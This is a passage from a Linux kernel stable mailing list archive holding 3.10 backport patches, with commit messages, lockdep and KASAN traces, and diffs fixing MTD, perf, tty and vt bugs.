        if (mutex_trylock(&mtd_table_mutex)) {
                mutex_unlock(&mtd_table_mutex);
                BUG();
        }

So, reverse the ordering of acquisition of &dev->lock and &mtd_table_mutex so
we always acquire mtd_table_mutex first.

Snippets of the lockdep output follow:

  # modprobe -r m25p80
  [   53.419251]
  [   53.420838] ======================================================
  [   53.427300] [ INFO: possible circular locking dependency detected ]
  [   53.433865] 4.3.0-rc6 #96 Not tainted
  [   53.437686] -------------------------------------------------------
  [   53.444220] modprobe/372 is trying to acquire lock:
  [   53.449320]  (&new->lock){+.+...}, at: [<c043fe4c>] del_mtd_blktrans_dev+0x80/0xdc
  [   53.457271]
  [   53.457271] but task is already holding lock:
  [   53.463372]  (mtd_table_mutex){+.+.+.}, at: [<c0439994>] del_mtd_device+0x18/0x100
  [   53.471321]
  [   53.471321] which lock already depends on the new lock.
  [   53.471321]
  [   53.479856]
  [   53.479856] the existing dependency chain (in reverse order) is:
  [   53.487660]
  -> #1 (mtd_table_mutex){+.+.+.}:
  [   53.492331]        [<c043fc5c>] blktrans_open+0x34/0x1a4
  [   53.497879]        [<c01afce0>] __blkdev_get+0xc4/0x3b0
  [   53.503364]        [<c01b0bb8>] blkdev_get+0x108/0x320
  [   53.508743]        [<c01713c0>] do_dentry_open+0x218/0x314
  [   53.514496]        [<c0180454>] path_openat+0x4c0/0xf9c
  [   53.519959]        [<c0182044>] do_filp_open+0x5c/0xc0
  [   53.525336]        [<c0172758>] do_sys_open+0xfc/0x1cc
  [   53.530716]        [<c000f740>] ret_fast_syscall+0x0/0x1c
  [   53.536375]
  -> #0 (&new->lock){+.+...}:
  [   53.540587]        [<c063f124>] mutex_lock_nested+0x38/0x3cc
  [   53.546504]        [<c043fe4c>] del_mtd_blktrans_dev+0x80/0xdc
  [   53.552606]        [<c043f164>] blktrans_notify_remove+0x7c/0x84
  [   53.558891]        [<c04399f0>] del_mtd_device+0x74/0x100
  [   53.564544]        [<c043c670>] del_mtd_partitions+0x80/0xc8
  [   53.570451]        [<c0439aa0>] mtd_device_unregister+0x24/0x48
  [   53.576637]        [<c046ce6c>] spi_drv_remove+0x1c/0x34
  [   53.582207]        [<c03de0f0>] __device_release_driver+0x88/0x114
  [   53.588663]        [<c03de19c>] device_release_driver+0x20/0x2c
  [   53.594843]        [<c03dd9e8>] bus_remove_device+0xd8/0x108
  [   53.600748]        [<c03dacc0>] device_del+0x10c/0x210
  [   53.606127]        [<c03dadd0>] device_unregister+0xc/0x20
  [   53.611849]        [<c046d878>] __unregister+0x10/0x20
  [   53.617211]        [<c03da868>] device_for_each_child+0x50/0x7c
  [   53.623387]        [<c046eae8>] spi_unregister_master+0x58/0x8c
  [   53.629578]        [<c03e12f0>] release_nodes+0x15c/0x1c8
  [   53.635223]        [<c03de0f8>] __device_release_driver+0x90/0x114
  [   53.641689]        [<c03de900>] driver_detach+0xb4/0xb8
  [   53.647147]        [<c03ddc78>] bus_remove_driver+0x4c/0xa0
  [   53.652970]        [<c00cab50>] SyS_delete_module+0x11c/0x1e4
  [   53.658976]        [<c000f740>] ret_fast_syscall+0x0/0x1c
  [   53.664621]
  [   53.664621] other info that might help us debug this:
  [   53.664621]
  [   53.672979]  Possible unsafe locking scenario:
  [   53.672979]
  [   53.679169]        CPU0                    CPU1
  [   53.683900]        ----                    ----
  [   53.688633]   lock(mtd_table_mutex);
  [   53.692383]                                lock(&new->lock);
  [   53.698306]                                lock(mtd_table_mutex);
  [   53.704658]   lock(&new->lock);
  [   53.707946]
  [   53.707946]  *** DEADLOCK ***

Fixes: 073db4a51ee4 ("mtd: fix: avoid race condition when accessing mtd->usecount")
Reported-by: Felipe Balbi <balbi@ti.com>
Tested-by: Felipe Balbi <balbi@ti.com>
Signed-off-by: Brian Norris <computersforpeace@gmail.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/mtd/mtd_blkdevs.c | 10 +++++-----
 1 file changed, 5 insertions(+), 5 deletions(-)

diff --git a/drivers/mtd/mtd_blkdevs.c b/drivers/mtd/mtd_blkdevs.c
index 32d5e40..48b63e8 100644
--- a/drivers/mtd/mtd_blkdevs.c
+++ b/drivers/mtd/mtd_blkdevs.c
@@ -198,8 +198,8 @@ static int blktrans_open(struct block_device *bdev, fmode_t mode)
 	if (!dev)
 		return -ERESTARTSYS; /* FIXME: busy loop! -arnd*/
 
-	mutex_lock(&dev->lock);
 	mutex_lock(&mtd_table_mutex);
+	mutex_lock(&dev->lock);
 
 	if (dev->open)
 		goto unlock;
@@ -223,8 +223,8 @@ static int blktrans_open(struct block_device *bdev, fmode_t mode)
 
 unlock:
 	dev->open++;
-	mutex_unlock(&mtd_table_mutex);
 	mutex_unlock(&dev->lock);
+	mutex_unlock(&mtd_table_mutex);
 	blktrans_dev_put(dev);
 	return ret;
 
@@ -234,8 +234,8 @@ error_release:
 error_put:
 	module_put(dev->tr->owner);
 	kref_put(&dev->ref, blktrans_dev_release);
-	mutex_unlock(&mtd_table_mutex);
 	mutex_unlock(&dev->lock);
+	mutex_unlock(&mtd_table_mutex);
 	blktrans_dev_put(dev);
 	return ret;
 }
@@ -247,8 +247,8 @@ static void blktrans_release(struct gendisk *disk, fmode_t mode)
 	if (!dev)
 		return;
 
-	mutex_lock(&dev->lock);
 	mutex_lock(&mtd_table_mutex);
+	mutex_lock(&dev->lock);
 
 	if (--dev->open)
 		goto unlock;
@@ -262,8 +262,8 @@ static void blktrans_release(struct gendisk *disk, fmode_t mode)
 		__put_mtd_device(dev->mtd);
 	}
 unlock:
-	mutex_unlock(&mtd_table_mutex);
 	mutex_unlock(&dev->lock);
+	mutex_unlock(&mtd_table_mutex);
 	blktrans_dev_put(dev);
 }
 
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 208/319] mtd: pmcmsp-flash: Allocating too much in init_msp_flash()
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (106 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 207/319] mtd: blkdevs: fix potential deadlock + lockdep warnings Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 209/319] mtd: nand: davinci: Reinitialize the HW ECC engine in 4bit hwctl Willy Tarreau
                   ` (110 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Dan Carpenter, Brian Norris, Willy Tarreau

From: Dan Carpenter <dan.carpenter@oracle.com>

commit 79ad07d45743721010e766e65dc004ad249bd429 upstream.

There is a cut and paste issue here.  The bug is that we are allocating
more memory than necessary for msp_maps.  We should be allocating enough
space for a map_info struct (144 bytes) but we instead allocate enough
for an mtd_info struct (1840 bytes).  It's a small waste.

The other part of this is not harmful but when we allocated msp_flash
then we allocated enough space fro a map_info pointer instead of an
mtd_info pointer.  But since pointers are the same size it works out
fine.

Anyway, I decided to clean up all three allocations a bit to make them
a bit more consistent and clear.

Fixes: 68aa0fa87f6d ('[MTD] PMC MSP71xx flash/rootfs mappings')
Signed-off-by: Dan Carpenter <dan.carpenter@oracle.com>
Signed-off-by: Brian Norris <computersforpeace@gmail.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/mtd/maps/pmcmsp-flash.c | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/drivers/mtd/maps/pmcmsp-flash.c b/drivers/mtd/maps/pmcmsp-flash.c
index 744ca5c..f9fa3fa 100644
--- a/drivers/mtd/maps/pmcmsp-flash.c
+++ b/drivers/mtd/maps/pmcmsp-flash.c
@@ -75,15 +75,15 @@ static int __init init_msp_flash(void)
 
 	printk(KERN_NOTICE "Found %d PMC flash devices\n", fcnt);
 
-	msp_flash = kmalloc(fcnt * sizeof(struct map_info *), GFP_KERNEL);
+	msp_flash = kcalloc(fcnt, sizeof(*msp_flash), GFP_KERNEL);
 	if (!msp_flash)
 		return -ENOMEM;
 
-	msp_parts = kmalloc(fcnt * sizeof(struct mtd_partition *), GFP_KERNEL);
+	msp_parts = kcalloc(fcnt, sizeof(*msp_parts), GFP_KERNEL);
 	if (!msp_parts)
 		goto free_msp_flash;
 
-	msp_maps = kcalloc(fcnt, sizeof(struct mtd_info), GFP_KERNEL);
+	msp_maps = kcalloc(fcnt, sizeof(*msp_maps), GFP_KERNEL);
 	if (!msp_maps)
 		goto free_msp_parts;
 
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 209/319] mtd: nand: davinci: Reinitialize the HW ECC engine in 4bit hwctl
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (107 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 208/319] mtd: pmcmsp-flash: Allocating too much in init_msp_flash() Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 210/319] perf symbols: Fixup symbol sizes before picking best ones Willy Tarreau
                   ` (109 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Karl Beldan, Brian Norris, Willy Tarreau

From: Karl Beldan <kbeldan@baylibre.com>

commit f6d7c1b5598b6407c3f1da795dd54acf99c1990c upstream.

This fixes subpage writes when using 4-bit HW ECC.

There has been numerous reports about ECC errors with devices using this
driver for a while.  Also the 4-bit ECC has been reported as broken with
subpages in [1] and with 16 bits NANDs in the driver and in mach* board
files both in mainline and in the vendor BSPs.

What I saw with 4-bit ECC on a 16bits NAND (on an LCDK) which got me to
try reinitializing the ECC engine:
- R/W on whole pages properly generates/checks RS code
- try writing the 1st subpage only of a blank page, the subpage is well
  written and the RS code properly generated, re-reading the same page
  the HW detects some ECC error, reading the same page again no ECC
  error is detected

Note that the ECC engine is already reinitialized in the 1-bit case.

Tested on my LCDK with UBI+UBIFS using subpages.
This could potentially get rid of the issue workarounded in [1].

[1] 28c015a9daab ("mtd: davinci-nand: disable subpage write for keystone-nand")

Fixes: 6a4123e581b3 ("mtd: nand: davinci_nand, 4-bit ECC for smallpage")
Signed-off-by: Karl Beldan <kbeldan@baylibre.com>
Acked-by: Boris Brezillon <boris.brezillon@free-electrons.com>
Signed-off-by: Brian Norris <computersforpeace@gmail.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/mtd/nand/davinci_nand.c | 3 +++
 1 file changed, 3 insertions(+)

diff --git a/drivers/mtd/nand/davinci_nand.c b/drivers/mtd/nand/davinci_nand.c
index c3e15a5..e4f16cf 100644
--- a/drivers/mtd/nand/davinci_nand.c
+++ b/drivers/mtd/nand/davinci_nand.c
@@ -241,6 +241,9 @@ static void nand_davinci_hwctl_4bit(struct mtd_info *mtd, int mode)
 	unsigned long flags;
 	u32 val;
 
+	/* Reset ECC hardware */
+	davinci_nand_readl(info, NAND_4BIT_ECC1_OFFSET);
+
 	spin_lock_irqsave(&davinci_nand_lock, flags);
 
 	/* Start 4-bit ECC calculation for read/write */
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 210/319] perf symbols: Fixup symbol sizes before picking best ones
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (108 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 209/319] mtd: nand: davinci: Reinitialize the HW ECC engine in 4bit hwctl Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 211/319] perf: Tighten (and fix) the grouping condition Willy Tarreau
                   ` (108 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Arnaldo Carvalho de Melo, Anton Blanchard, Adrian Hunter,
	David Ahern, Jiri Olsa, Masami Hiramatsu, Namhyung Kim, Wang Nan,
	Willy Tarreau

From: Arnaldo Carvalho de Melo <acme@redhat.com>

commit 432746f8e0b6a82ba832b771afe31abd51af6752 upstream.

When we call symbol__fixup_duplicate() we use algorithms to pick the
"best" symbols for cases where there are various functions/aliases to an
address, and those check zero size symbols, which, before calling
symbol__fixup_end() are _all_ symbols in a just parsed kallsyms file.

So first fixup the end, then fixup the duplicates.

Found while trying to figure out why 'perf test vmlinux' failed, see the
output of 'perf test -v vmlinux' to see cases where the symbols picked
as best for vmlinux don't match the ones picked for kallsyms.

Cc: Anton Blanchard <anton@samba.org>
Cc: Adrian Hunter <adrian.hunter@intel.com>
Cc: David Ahern <dsahern@gmail.com>
Cc: Jiri Olsa <jolsa@kernel.org>
Cc: Masami Hiramatsu <mhiramat@kernel.org>
Cc: Namhyung Kim <namhyung@kernel.org>
Cc: Wang Nan <wangnan0@huawei.com>
Fixes: 694bf407b061 ("perf symbols: Add some heuristics for choosing the best duplicate symbol")
Link: http://lkml.kernel.org/n/tip-rxqvdgr0mqjdxee0kf8i2ufn@git.kernel.org
Signed-off-by: Arnaldo Carvalho de Melo <acme@redhat.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 tools/perf/util/symbol-elf.c | 2 +-
 tools/perf/util/symbol.c     | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)

diff --git a/tools/perf/util/symbol-elf.c b/tools/perf/util/symbol-elf.c
index 4b12bf8..f7718c8 100644
--- a/tools/perf/util/symbol-elf.c
+++ b/tools/perf/util/symbol-elf.c
@@ -831,8 +831,8 @@ new_symbol:
 	 * For misannotated, zeroed, ASM function sizes.
 	 */
 	if (nr > 0) {
-		symbols__fixup_duplicate(&dso->symbols[map->type]);
 		symbols__fixup_end(&dso->symbols[map->type]);
+		symbols__fixup_duplicate(&dso->symbols[map->type]);
 		if (kmap) {
 			/*
 			 * We need to fixup this here too because we create new
diff --git a/tools/perf/util/symbol.c b/tools/perf/util/symbol.c
index 8cf3b54..a2fe760 100644
--- a/tools/perf/util/symbol.c
+++ b/tools/perf/util/symbol.c
@@ -673,8 +673,8 @@ int dso__load_kallsyms(struct dso *dso, const char *filename,
 	if (dso__load_all_kallsyms(dso, filename, map) < 0)
 		return -1;
 
-	symbols__fixup_duplicate(&dso->symbols[map->type]);
 	symbols__fixup_end(&dso->symbols[map->type]);
+	symbols__fixup_duplicate(&dso->symbols[map->type]);
 
 	if (dso->kernel == DSO_TYPE_GUEST_KERNEL)
 		dso->symtab_type = DSO_BINARY_TYPE__GUEST_KALLSYMS;
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 211/319] perf: Tighten (and fix) the grouping condition
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (109 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 210/319] perf symbols: Fixup symbol sizes before picking best ones Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 212/319] tty: Prevent ldisc drivers from re-using stale tty fields Willy Tarreau
                   ` (107 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Peter Zijlstra, Arnaldo Carvalho de Melo, Jiri Olsa,
	Linus Torvalds, Ingo Molnar, Willy Tarreau

From: Peter Zijlstra <peterz@infradead.org>

commit c3c87e770458aa004bd7ed3f29945ff436fd6511 upstream.

The fix from 9fc81d87420d ("perf: Fix events installation during
moving group") was incomplete in that it failed to recognise that
creating a group with events for different CPUs is semantically
broken -- they cannot be co-scheduled.

Furthermore, it leads to real breakage where, when we create an event
for CPU Y and then migrate it to form a group on CPU X, the code gets
confused where the counter is programmed -- triggered in practice
as well by me via the perf fuzzer.

Fix this by tightening the rules for creating groups. Only allow
grouping of counters that can be co-scheduled in the same context.
This means for the same task and/or the same cpu.

Fixes: 9fc81d87420d ("perf: Fix events installation during moving group")
Signed-off-by: Peter Zijlstra (Intel) <peterz@infradead.org>
Cc: Arnaldo Carvalho de Melo <acme@kernel.org>
Cc: Jiri Olsa <jolsa@redhat.com>
Cc: Linus Torvalds <torvalds@linux-foundation.org>
Link: http://lkml.kernel.org/r/20150123125834.090683288@infradead.org
Signed-off-by: Ingo Molnar <mingo@kernel.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 include/linux/perf_event.h |  6 ------
 kernel/events/core.c       | 15 +++++++++++++--
 2 files changed, 13 insertions(+), 8 deletions(-)

diff --git a/include/linux/perf_event.h b/include/linux/perf_event.h
index 229a757..3204422 100644
--- a/include/linux/perf_event.h
+++ b/include/linux/perf_event.h
@@ -430,11 +430,6 @@ struct perf_event {
 #endif /* CONFIG_PERF_EVENTS */
 };
 
-enum perf_event_context_type {
-	task_context,
-	cpu_context,
-};
-
 /**
  * struct perf_event_context - event context structure
  *
@@ -442,7 +437,6 @@ enum perf_event_context_type {
  */
 struct perf_event_context {
 	struct pmu			*pmu;
-	enum perf_event_context_type	type;
 	/*
 	 * Protect the states of the events in the list,
 	 * nr_active, and the list:
diff --git a/kernel/events/core.c b/kernel/events/core.c
index 0f52078..76e26b8 100644
--- a/kernel/events/core.c
+++ b/kernel/events/core.c
@@ -6249,7 +6249,6 @@ skip_type:
 		__perf_event_init_context(&cpuctx->ctx);
 		lockdep_set_class(&cpuctx->ctx.mutex, &cpuctx_mutex);
 		lockdep_set_class(&cpuctx->ctx.lock, &cpuctx_lock);
-		cpuctx->ctx.type = cpu_context;
 		cpuctx->ctx.pmu = pmu;
 		cpuctx->jiffies_interval = 1;
 		INIT_LIST_HEAD(&cpuctx->rotation_list);
@@ -6856,7 +6855,19 @@ SYSCALL_DEFINE5(perf_event_open,
 		 * task or CPU context:
 		 */
 		if (move_group) {
-			if (group_leader->ctx->type != ctx->type)
+			/*
+			 * Make sure we're both on the same task, or both
+			 * per-cpu events.
+			 */
+			if (group_leader->ctx->task != ctx->task)
+				goto err_context;
+
+			/*
+			 * Make sure we're both events for the same CPU;
+			 * grouping events for different CPUs is broken; since
+			 * you can never concurrently schedule them anyhow.
+			 */
+			if (group_leader->cpu != event->cpu)
 				goto err_context;
 		} else {
 			if (group_leader->ctx != ctx)
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 212/319] tty: Prevent ldisc drivers from re-using stale tty fields
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (110 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 211/319] perf: Tighten (and fix) the grouping condition Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 213/319] tty: limit terminal size to 4M chars Willy Tarreau
                   ` (106 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Peter Hurley, Tilman Schmidt, Sasha Levin, Greg Kroah-Hartman,
	Willy Tarreau

From: Peter Hurley <peter@hurleysoftware.com>

commit dd42bf1197144ede075a9d4793123f7689e164bc upstream.

Line discipline drivers may mistakenly misuse ldisc-related fields
when initializing. For example, a failure to initialize tty->receive_room
in the N_GIGASET_M101 line discipline was recently found and fixed [1].
Now, the N_X25 line discipline has been discovered accessing the previous
line discipline's already-freed private data [2].

Harden the ldisc interface against misuse by initializing revelant
tty fields before instancing the new line discipline.

[1]
    commit fd98e9419d8d622a4de91f76b306af6aa627aa9c
    Author: Tilman Schmidt <tilman@imap.cc>
    Date:   Tue Jul 14 00:37:13 2015 +0200

    isdn/gigaset: reset tty->receive_room when attaching ser_gigaset

[2] Report from Sasha Levin <sasha.levin@oracle.com>
    [  634.336761] ==================================================================
    [  634.338226] BUG: KASAN: use-after-free in x25_asy_open_tty+0x13d/0x490 at addr ffff8800a743efd0
    [  634.339558] Read of size 4 by task syzkaller_execu/8981
    [  634.340359] =============================================================================
    [  634.341598] BUG kmalloc-512 (Not tainted): kasan: bad access detected
    ...
    [  634.405018] Call Trace:
    [  634.405277] dump_stack (lib/dump_stack.c:52)
    [  634.405775] print_trailer (mm/slub.c:655)
    [  634.406361] object_err (mm/slub.c:662)
    [  634.406824] kasan_report_error (mm/kasan/report.c:138 mm/kasan/report.c:236)
    [  634.409581] __asan_report_load4_noabort (mm/kasan/report.c:279)
    [  634.411355] x25_asy_open_tty (drivers/net/wan/x25_asy.c:559 (discriminator 1))
    [  634.413997] tty_ldisc_open.isra.2 (drivers/tty/tty_ldisc.c:447)
    [  634.414549] tty_set_ldisc (drivers/tty/tty_ldisc.c:567)
    [  634.415057] tty_ioctl (drivers/tty/tty_io.c:2646 drivers/tty/tty_io.c:2879)
    [  634.423524] do_vfs_ioctl (fs/ioctl.c:43 fs/ioctl.c:607)
    [  634.427491] SyS_ioctl (fs/ioctl.c:622 fs/ioctl.c:613)
    [  634.427945] entry_SYSCALL_64_fastpath (arch/x86/entry/entry_64.S:188)

Cc: Tilman Schmidt <tilman@imap.cc>
Cc: Sasha Levin <sasha.levin@oracle.com>
Signed-off-by: Peter Hurley <peter@hurleysoftware.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[wt: adjust context]

Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/tty/tty_ldisc.c | 7 +++++++
 1 file changed, 7 insertions(+)

diff --git a/drivers/tty/tty_ldisc.c b/drivers/tty/tty_ldisc.c
index 1afe192..b5cbe12 100644
--- a/drivers/tty/tty_ldisc.c
+++ b/drivers/tty/tty_ldisc.c
@@ -400,6 +400,10 @@ EXPORT_SYMBOL_GPL(tty_ldisc_flush);
  *	they are not on hot paths so a little discipline won't do
  *	any harm.
  *
+ *	The line discipline-related tty_struct fields are reset to
+ *	prevent the ldisc driver from re-using stale information for
+ *	the new ldisc instance.
+ *
  *	Locking: takes termios_mutex
  */
 
@@ -408,6 +412,9 @@ static void tty_set_termios_ldisc(struct tty_struct *tty, int num)
 	mutex_lock(&tty->termios_mutex);
 	tty->termios.c_line = num;
 	mutex_unlock(&tty->termios_mutex);
+
+	tty->disc_data = NULL;
+	tty->receive_room = 0;
 }
 
 /**
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 213/319] tty: limit terminal size to 4M chars
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (111 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 212/319] tty: Prevent ldisc drivers from re-using stale tty fields Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 214/319] tty: vt, fix bogus division in csi_J Willy Tarreau
                   ` (105 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Dmitry Vyukov, David Rientjes, One Thousand Gnomes,
	Greg Kroah-Hartman, Jiri Slaby, Peter Hurley, syzkaller,
	Willy Tarreau

From: Dmitry Vyukov <dvyukov@google.com>

commit 32b2921e6a7461fe63b71217067a6cf4bddb132f upstream.

Size of kmalloc() in vc_do_resize() is controlled by user.
Too large kmalloc() size triggers WARNING message on console.
Put a reasonable upper bound on terminal size to prevent WARNINGs.

Signed-off-by: Dmitry Vyukov <dvyukov@google.com>
CC: David Rientjes <rientjes@google.com>
Cc: One Thousand Gnomes <gnomes@lxorguk.ukuu.org.uk>
Cc: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Cc: Jiri Slaby <jslaby@suse.com>
Cc: Peter Hurley <peter@hurleysoftware.com>
Cc: linux-kernel@vger.kernel.org
Cc: syzkaller@googlegroups.com
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/tty/vt/vt.c | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/drivers/tty/vt/vt.c b/drivers/tty/vt/vt.c
index 6dff194..ee51acd 100644
--- a/drivers/tty/vt/vt.c
+++ b/drivers/tty/vt/vt.c
@@ -863,6 +863,8 @@ static int vc_do_resize(struct tty_struct *tty, struct vc_data *vc,
 	if (new_cols == vc->vc_cols && new_rows == vc->vc_rows)
 		return 0;
 
+	if (new_screen_size > (4 << 20))
+		return -EINVAL;
 	newscreen = kmalloc(new_screen_size, GFP_USER);
 	if (!newscreen)
 		return -ENOMEM;
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 214/319] tty: vt, fix bogus division in csi_J
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (112 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 213/319] tty: limit terminal size to 4M chars Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 215/319] vt: clear selection before resizing Willy Tarreau
                   ` (104 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Jiri Slaby, Petr Písař, Greg Kroah-Hartman, Willy Tarreau

From: Jiri Slaby <jslaby@suse.cz>

commit 42acfc6615f47e465731c263bee0c799edb098f2 upstream.

In csi_J(3), the third parameter of scr_memsetw (vc_screenbuf_size) is
divided by 2 inappropriatelly. But scr_memsetw expects size, not
count, because it divides the size by 2 on its own before doing actual
memset-by-words.

So remove the bogus division.

Signed-off-by: Jiri Slaby <jslaby@suse.cz>
Cc: Petr Písař <ppisar@redhat.com>
Fixes: f8df13e0a9 (tty: Clean console safely)
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/tty/vt/vt.c | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/drivers/tty/vt/vt.c b/drivers/tty/vt/vt.c
index ee51acd..5deddca 100644
--- a/drivers/tty/vt/vt.c
+++ b/drivers/tty/vt/vt.c
@@ -1166,7 +1166,7 @@ static void csi_J(struct vc_data *vc, int vpar)
 			break;
 		case 3: /* erase scroll-back buffer (and whole display) */
 			scr_memsetw(vc->vc_screenbuf, vc->vc_video_erase_char,
-				    vc->vc_screenbuf_size >> 1);
+				    vc->vc_screenbuf_size);
 			set_origin(vc);
 			if (CON_IS_VISIBLE(vc))
 				update_screen(vc);
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 215/319] vt: clear selection before resizing
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (113 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 214/319] tty: vt, fix bogus division in csi_J Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 216/319] drivers/vfio: Rework offsetofend() Willy Tarreau
                   ` (103 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Scot Doyle, Willy Tarreau

From: Scot Doyle <lkml14@scotdoyle.com>

commit 009e39ae44f4191188aeb6dfbf661b771dbbe515 upstream.

When resizing a vt its selection may exceed the new size, resulting in
an invalid memory access [1]. Clear the selection before resizing.

[1] http://lkml.kernel.org/r/CACT4Y+acDTwy4umEvf5ROBGiRJNrxHN4Cn5szCXE5Jw-d1B=Xw@mail.gmail.com

Reported-and-tested-by: Dmitry Vyukov <dvyukov@google.com>
Signed-off-by: Scot Doyle <lkml14@scotdoyle.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/tty/vt/vt.c | 3 +++
 1 file changed, 3 insertions(+)

diff --git a/drivers/tty/vt/vt.c b/drivers/tty/vt/vt.c
index 5deddca..010ec70 100644
--- a/drivers/tty/vt/vt.c
+++ b/drivers/tty/vt/vt.c
@@ -869,6 +869,9 @@ static int vc_do_resize(struct tty_struct *tty, struct vc_data *vc,
 	if (!newscreen)
 		return -ENOMEM;
 
+	if (vc == sel_cons)
+		clear_selection();
+
 	old_rows = vc->vc_rows;
 	old_row_size = vc->vc_size_row;
 
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 216/319] drivers/vfio: Rework offsetofend()
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (114 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 215/319] vt: clear selection before resizing Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 217/319] include/stddef.h: Move offsetofend() from vfio.h to a generic kernel header Willy Tarreau
                   ` (102 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
